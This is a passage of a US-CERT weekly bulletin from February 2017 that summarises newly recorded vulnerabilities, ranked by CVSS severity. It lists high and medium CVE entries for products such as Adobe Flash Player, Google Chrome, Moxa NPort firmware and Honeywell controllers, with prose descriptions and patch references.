SB17-051: Vulnerability Summary for the Week of February 13, 2017

Original release date: February 20, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a code injection vulnerability. 2017-02-15 7.5 CVE-2017-2968
CONFIRM
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2973
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in a routine related to player shutdown. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2982
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability in the h264 decoder routine. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2984
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in the ActionScript 3 BitmapData class. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2985
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability in the Flash Video (FLV) codec. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2986
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable integer overflow vulnerability related to Flash Broker COM. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2987
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability when performing garbage collection. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2988
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in the h264 decompression routine. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2990
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in the h264 codec (related to decompression). Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2991
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability when parsing an MP4 header. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2992
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability related to event handlers. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2993
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in Primetime SDK. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2996
CONFIRM
advantech — susiaccess An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. The admin password is stored in the system and is encrypted with a static key hard-coded in the program. Attackers could reverse the admin account password for use. 2017-02-13 7.2 CVE-2016-9353
BID
MISC
advantech — webaccess An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files. 2017-02-13 7.5 CVE-2017-5154
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Lack of authentication for remote service gives access to application set up and configuration. 2017-02-13 10.0 CVE-2017-5162
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Users do not have any option to change their own passwords. 2017-02-13 7.5 CVE-2017-5167
BID
MISC
dotcms — dotcms An issue was discovered in dotCMS through 3.6.1. The findChildrenByFilter() function which is called by the web accessible path /categoriesServlet performs string interpolation and direct SQL query execution. SQL quote escaping and a keyword blacklist were implemented in a new class, SQLUtil (main/java/com/dotmarketing/common/util/SQLUtil.java), as part of the remediation of CVE-2016-8902; however, these can be overcome in the case of the q and inode parameters to the /categoriesServlet path. Overcoming these controls permits a number of blind boolean SQL injection vectors in either parameter. The /categoriesServlet web path can be accessed remotely and without authentication in a default dotCMS deployment. 2017-02-17 7.5 CVE-2017-5344
MISC
MISC
MISC
exponentcms — exponent_cms install/index.php in Exponent CMS 2.3.9 allows remote attackers to execute arbitrary commands via shell metacharacters in the sc array parameter. 2017-02-13 7.5 CVE-2016-7565
MLIST
CONFIRM
CONFIRM
freebsd — freebsd The Linux compatibility layer in the kernel in FreeBSD 9.3, 10.1, and 10.2 allows local users to read portions of kernel memory and potentially gain privilege via unspecified vectors, related to "handling of Linux futex robust lists." 2017-02-15 7.2 CVE-2016-1880
SECTRACK
FREEBSD
freebsd — freebsd The kernel in FreeBSD 9.3, 10.1, and 10.2 allows local users to cause a denial of service (crash) or potentially gain privilege via a crafted Linux compatibility layer setgroups system call. 2017-02-15 7.2 CVE-2016-1881
SECTRACK
FREEBSD
freebsd — freebsd The issetugid system call in the Linux compatibility layer in FreeBSD 9.3, 10.1, and 10.2 allows local users to gain privilege via unspecified vectors. 2017-02-15 7.2 CVE-2016-1883
SECTRACK
FREEBSD
freebsd — freebsd Integer overflow in the bhyve hypervisor in FreeBSD 10.1, 10.2, 10.3, and 11.0 when configured with a large amount of guest memory, allows local users to gain privilege via a crafted device descriptor. 2017-02-15 7.2 CVE-2016-1889
SECTRACK
FREEBSD
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. A user without authenticating can make a directory traversal attack by accessing a specific URL. 2017-02-13 7.5 CVE-2017-5143
BID
MISC
ibm — integration_bus IBM Integration Bus 9.0 and 10.0 and WebSphere Message Broker SOAP FLOWS is vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory resources. IBM Reference #: 1997918. 2017-02-15 8.5 CVE-2016-9706
CONFIRM
ibm — vios IBM AIX 5.3, 6.1, 7.1, and 7.2 contains an unspecified vulnerability that would allow a locally authenticated user to obtain root level privileges. IBM APARs: IV88658, IV87981, IV88419, IV87640, IV88053. 2017-02-15 7.2 CVE-2016-6079
CONFIRM
BID
ibm — vios IBM AIX 6.1, 7.1, and 7.2 could allow a local user to gain root privileges using a specially crafted command within the bellmail client. IBM APARs: IV91006, IV91007, IV91008, IV91010, IV91011. 2017-02-15 7.2 CVE-2016-8972
CONFIRM
BID
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application uses a hard-coded username with no password allowing an attacker into the system without authentication. 2017-02-13 7.5 CVE-2016-8361
BID
MISC
moxa — dacenter An issue was discovered in Moxa DACenter Versions 1.4 and older. A specially crafted project file may cause the program to crash because of Uncontrolled Resource Consumption. 2017-02-13 7.1 CVE-2016-9354
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Administration passwords can be retried without authenticating. 2017-02-13 7.5 CVE-2016-9361
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Buffer overflow vulnerability may allow an unauthenticated attacker to remotely execute arbitrary code. 2017-02-13 7.5 CVE-2016-9363
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. The amount of resources requested by a malicious actor is not restricted, leading to a denial-of-service caused by resource exhaustion. 2017-02-13 7.8 CVE-2016-9367
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Firmware can be updated over the network without authentication, which may allow remote code execution. 2017-02-13 10.0 CVE-2016-9369
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. Moxa SoftCMS Webserver does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition. 2017-02-13 7.8 CVE-2016-9332
BID
MISC
nagios — nagios Nagios 4.2.4 and earlier allows local users to gain root privileges via a hard link attack on the Nagios init script file, related to CVE-2016-8641. 2017-02-15 7.2 CVE-2016-10089
MLIST
BID
schneider-electric — powerlogic_pm8ecc_firmware An issue was discovered in Schneider Electric PowerLogic PM8ECC device 2.651 and older. Undocumented hard-coded credentials allow access to the device. 2017-02-13 7.5 CVE-2016-5818
BID
MISC
videoinsight — web_client An issue was discovered in VideoInsight Web Client Version 6.3.5.11 and previous versions. A SQL Injection vulnerability has been identified, which may allow remote code execution. 2017-02-13 7.5 CVE-2017-5151
BID
MISC
vim — vim vim before patch 8.0.0322 does not properly validate values for tree length when handling a spell file, which may result in an integer overflow at a memory allocation site and a resultant buffer overflow. 2017-02-10 7.5 CVE-2017-5953
CONFIRM
CONFIRM
wireshark — wireshark In Wireshark 2.2.4 and earlier, a crafted or malformed STANAG 4607 capture file will cause an infinite loop and memory exhaustion. If the packet size field in a packet header is null, the offset to read from will not advance, causing continuous attempts to read the same zero length packet. This will quickly exhaust all system memory. 2017-02-17 7.8 CVE-2017-6014
CONFIRM

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adcon_telemetry — a850_telemetry_gateway_base_station_firmware An issue was discovered in Adcon Telemetry A850 Telemetry Gateway Base Station. The Web Interface does not neutralize or incorrectly neutralizes user-controllable input before it is placed in the output; this could allow for cross-site scripting. 2017-02-13 4.3 CVE-2016-2274
BID
MISC
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a cross-site scripting (XSS) vulnerability. 2017-02-15 4.3 CVE-2017-2969
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2974
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2975
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2976
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2977
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2978
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2979
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2980
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2981
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in Primetime SDK event dispatch. Successful exploitation could lead to arbitrary code execution. 2017-02-15 6.8 CVE-2017-2994
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable type confusion vulnerability related to the MessageChannel class. Successful exploitation could lead to arbitrary code execution. 2017-02-15 6.8 CVE-2017-2995
CONFIRM
advantech — susiaccess An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure. 2017-02-13 5.0 CVE-2016-9349
BID
MISC
advantech — susiaccess An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. The directory traversal/file upload error allows an attacker to upload and unpack a zip file. 2017-02-13 6.0 CVE-2016-9351
BID
MISC
advantech — webaccess An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). 2017-02-13 6.4 CVE-2017-5152
BID
MISC
artifex — mupdf The pdf_to_num function in pdf-object.c in MuPDF before 1.10 allows remote attackers to cause a denial of service (use-after-free and application crash) via a crafted file. 2017-02-15 4.3 CVE-2016-8674
CONFIRM
MLIST
BID
MISC
CONFIRM
CONFIRM
CONFIRM
artifex — mupdf Heap-based buffer overflow in the fz_subsample_pixmap function in fitz/pixmap.c in MuPDF 1.10a allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted image. 2017-02-15 4.3 CVE-2017-5896
CONFIRM
MLIST
MLIST
BID
CONFIRM
autotrace_project — autotrace Heap-based buffer overflow in the pstoedit_suffix_table_init function in output-pstoedit.c in AutoTrace 0.31.1 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted bmp image file. 2017-02-15 4.3 CVE-2016-7392
MLIST
MLIST
BID
MISC
CONFIRM
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Input sent from a malicious client is not properly verified by the server. An attacker can execute arbitrary script code in another user’s browser session (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2017-5164
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. There is no CSRF Token generated per page and/or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 2017-02-13 6.8 CVE-2017-5165
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. An INFORMATION EXPOSURE flaw can be used to gain privileged access to the device. 2017-02-13 5.0 CVE-2017-5166
BID
MISC
bubblewrap_project — bubblewrap Bubblewrap before 0.1.3 sets the PR_SET_DUMPABLE flag, which might allow local users to gain privileges by attaching to the process, as demonstrated by sending commands to a PrivSep socket. 2017-02-13 6.9 CVE-2016-8659
MLIST
MLIST
BID
CONFIRM
fatek — automation_pm_designer An issue was discovered in Fatek Automation PM Designer V3 Version 2.1.2.2, and Automation FV Designer Version 1.2.8.0. Sending additional valid packets could allow the attacker to cause a crash or to execute arbitrary code, because of Improper Restriction of Operations within the Bounds of a Memory Buffer. 2017-02-13 6.8 CVE-2016-5796
BID
MISC
fatek — automation_pm_designer An issue was discovered in Fatek Automation PM Designer V3 Version 2.1.2.2, and Automation FV Designer Version 1.2.8.0. By sending additional valid packets, an attacker could trigger a stack-based buffer overflow and cause a crash. Also, a malicious attacker can trigger a remote buffer overflow on the Fatek Communication Server. 2017-02-13 5.0 CVE-2016-5798
BID
MISC
fedoraproject — fedora slock allows attackers to bypass the screen lock via vectors involving an invalid password hash, which triggers a NULL pointer dereference and crash. 2017-02-15 5.0 CVE-2016-6866
CONFIRM
MISC
MLIST
MLIST
BID
FEDORA
FEDORA
fedoraproject — fedora regex.c in GNU ed before 1.14.1 allows attackers to cause a denial of service (crash) via a malformed command, which triggers an invalid free. 2017-02-16 5.0 CVE-2017-5357
MLIST
MLIST
MLIST
MLIST
BID
FEDORA
MLIST
freebsd — freebsd The telnetd service in FreeBSD 9.3, 10.1, 10.2, 10.3, and 11.0 allows remote attackers to inject arguments to login and bypass authentication via vectors involving a "sequence of memory allocation failures." 2017-02-15 5.0 CVE-2016-1888
SECTRACK
FREEBSD
gnu — glibc Memory leak in the __res_vinit function in the IPv6 name server management code in libresolv in GNU C Library (aka glibc or libc6) before 2.24 allows remote attackers to cause a denial of service (memory consumption) by leveraging partial initialization of internal resolver data structures. 2017-02-16 5.0 CVE-2016-5417
MLIST
BID
CONFIRM
CONFIRM
MLIST
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled object owner relationships, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5006
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled the sequence of events when closing a page, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5007
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed attacker controlled JavaScript to be run during the invocation of a private script method, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5008
BID
CONFIRM
CONFIRM
google — chrome WebRTC in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5009
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, resolved promises in an inappropriate context, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5010
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Windows insufficiently sanitized DevTools URLs, which allowed a remote attacker who convinced a user to install a malicious extension to read filesystem contents via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5011
BID
CONFIRM
CONFIRM
google — chrome A heap buffer overflow in V8 in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5012
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux incorrectly handled new tab page navigations in non-selected tabs, which allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5013
BID
CONFIRM
CONFIRM
google — chrome Heap buffer overflow during image processing in Skia in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5014
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled Unicode glyphs, which allowed a remote attacker to perform domain spoofing via IDN homographs in a crafted domain name. 2017-02-17 4.3 CVE-2017-5015
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to prevent certain UI elements from being displayed by non-visible pages, which allowed a remote attacker to show certain UI elements on a page they don’t control via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5016
BID
CONFIRM
CONFIRM
google — chrome A use after free in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5019
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to require a user gesture for powerful download operations, which allowed a remote attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5020
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to properly enforce unsafe-inline content security policy, which allowed a remote attacker to bypass content security policy via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5022
BID
CONFIRM
CONFIRM
google — chrome Type confusion in Histogram in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit a near null dereference via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5023
BID
CONFIRM
CONFIRM
google — chrome FFmpeg in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted video file. 2017-02-17 4.3 CVE-2017-5025
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to prevent alerts from being displayed by swapped out frames, which allowed a remote attacker to show alerts on a page they don’t control via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5026
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to properly enforce unsafe-inline content security policy, which allowed a remote attacker to bypass content security policy via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5027
CONFIRM
CONFIRM
gosa_project — gosa_plugin Cross-site scripting (XSS) vulnerability in the displayLogin function in html/index.php in GOsa allows remote attackers to inject arbitrary web script or HTML via the username. 2017-02-13 4.3 CVE-2014-9760
MLIST
CONFIRM
graphicsmagick — graphicsmagick The ReadSCTImage function in coders/sct.c in GraphicsMagick 1.3.25 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted SCT header. 2017-02-15 5.0 CVE-2016-8682
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
graphicsmagick — graphicsmagick The ReadPCXImage function in coders/pcx.c in GraphicsMagick 1.3.25 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure and a "file truncation error for corrupt file." 2017-02-15 6.8 CVE-2016-8683
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
graphicsmagick — graphicsmagick The MagickMalloc function in magick/memory.c in GraphicsMagick 1.3.25 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure and a "file truncation error for corrupt file." 2017-02-15 6.8 CVE-2016-8684
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. Any user is able to disclose a password by accessing a specific URL, because of Plaintext Storage of a Password. 2017-02-13 5.0 CVE-2017-5139
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. Password is stored in clear text. 2017-02-13 5.0 CVE-2017-5140
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. An attacker can establish a new user session, without invalidating any existing session identifier, which gives the opportunity to steal authenticated sessions (SESSION FIXATION). 2017-02-13 6.5 CVE-2017-5141
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. A user with low privileges is able to open and change the parameters by accessing a specific URL because of Improper Privilege Management. 2017-02-13 6.5 CVE-2017-5142
BID
MISC
ibm — aix IBM AIX 7.1 and 7.2 allows a local user to open a file with a specially crafted argument that would crash the system. IBM APARs: IV91488, IV91487, IV91456, IV90234. 2017-02-15 4.9 CVE-2016-8944
CONFIRM
BID
ibm — cognos_disclosure_management IBM Cognos Disclosure Management 10.2 could allow a malicious attacker to execute commands as a lower privileged user that opens a malicious document. IBM Reference #: 1991584. 2017-02-15 6.8 CVE-2016-6077
CONFIRM
BID
ibm — integration_bus IBM WebSphere Message Broker 9.0 and 10.0 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim’s click actions and possibly launch further attacks against the victim. IBM Reference #: 1997906. 2017-02-15 4.3 CVE-2016-9010
CONFIRM
ibm — rational_requirements_composer An undisclosed vulnerability in IBM Rational DOORS Next Generation 4.0, 5.0, and 6.0 could allow a JazzGuest user to see project names. IBM Reference #: 1995547. 2017-02-15 4.0 CVE-2016-6060
CONFIRM
kabona_ab — webdatorcentral An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. The web server URL inputs are not sanitized correctly, which may allow cross-site scripting vulnerabilities. 2017-02-13 4.3 CVE-2016-8356
BID
MISC
kabona_ab — webdatorcentral An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. This non-validated redirect/non-validated forward (OPEN REDIRECT) allows chaining with authenticated vulnerabilities. 2017-02-13 5.8 CVE-2016-8376
BID
MISC
libav — libav Heap-based buffer overflow in the ff_audio_resample function in resample.c in libav before 11.4 allows remote attackers to cause a denial of service (crash) via vectors related to buffer resizing. 2017-02-15 4.3 CVE-2016-6832
MLIST
MLIST
MISC
CONFIRM
CONFIRM
libav — libav Stack-based buffer overflow in the aac_sync function in aac_parser.c in Libav before 11.5 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-15 4.3 CVE-2016-7393
MLIST
BID
MISC
CONFIRM
libav — libav The ff_put_pixels8_xy2_mmx function in rnd_template.c in Libav 11.7 allows remote attackers to cause a denial of service (invalid memory access and crash) via a crafted mp3 file. NOTE: this issue was originally reported as involving a NULL pointer dereference. 2017-02-15 4.3 CVE-2016-7477
MLIST
BID
MISC
libav — libav The sbr_make_f_master function in aacsbr.c in Libav 11.7 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted mp3 file. 2017-02-15 4.3 CVE-2016-7499
MLIST
BID
MISC
CONFIRM
libav — libav The get_vlc2 function in get_bits.h in Libav before 11.9 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted mp3 file, possibly related to startcode sequences during m4v detection. 2017-02-15 4.3 CVE-2016-8675
MLIST
BID
MISC
CONFIRM
libav — libav The get_vlc2 function in get_bits.h in Libav 11.9 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted mp3 file. NOTE: this issue exists due to an incomplete fix for CVE-2016-8675. 2017-02-15 4.3 CVE-2016-8676
MLIST
MLIST
BID
MISC
MISC
libdwarf_project — libdwarf libdwarf 20151114 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a debug_abbrev section marked NOBITS in an ELF file. 2017-02-13 4.3 CVE-2015-8750
MLIST
